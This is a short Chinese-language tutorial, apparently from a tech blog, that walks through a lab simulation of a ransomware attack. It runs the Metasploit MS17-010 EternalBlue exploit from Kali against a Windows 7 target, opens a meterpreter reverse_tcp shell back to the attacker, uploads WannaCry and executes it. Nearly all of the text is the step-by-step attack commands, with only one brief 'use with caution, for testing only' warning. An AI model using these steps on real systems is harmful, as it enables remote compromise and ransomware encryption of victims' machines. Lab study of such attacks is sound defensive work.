1. 程式人生 > >勒索病毒場景模擬及原理

勒索病毒場景模擬及原理

慎用 進行 -c 傳輸 應用 win fff inf 攻擊

一、環境準備

需準備如下環境及工具:

1) 一臺攻擊虛機(Kali linux),一臺靶機(Win7 64位)

3) 永恒之藍(wannacry)病毒文件

二、環境準備

1.在kali linux下啟動msfconsole

通過該應用,可以訪問和使用所有的metasploit的插件,payload,利用模塊,post模塊等。

root@kali:~#msfconsole

技術分享圖片

2.利用永恒之藍MS17-010漏洞

msf > use exploit/windows/smb/ms17_010_eternalblue

技術分享圖片

3. 設定靶機 IP 和操作機 IP

172.22.170.4為操作機kali-linux ip地址
172.22.171.4為靶機windows 7 ip地址

msf exploit (windows/smb/ms17_010_eternalblue) >  set rhost 172.22.171.4
msf exploit (windows/smb/ms17_010_eternalblue) >  set lhost 172.22.170.4

技術分享圖片

技術分享圖片

4.設置TCP連接

使用meterpreter編寫的TCP反彈連接木馬,用於在滲透成功後向攻擊機發起連接請求進一步控制靶機的模塊。

set payload windows/x64/meterpreter/reverse_tcp

技術分享圖片

技術分享圖片

技術分享圖片

5.進行滲透

界面如下顯示,則表示滲透成功

技術分享圖片

6.向目標主機傳輸病毒文件(慎用,僅用於實驗測試)

技術分享圖片

成功傳輸

技術分享圖片

6.在目標主機上執行該病毒文件

execute -f C:\\Wannacry.exe

7.目標主機被攻陷

技術分享圖片

勒索病毒場景模擬及原理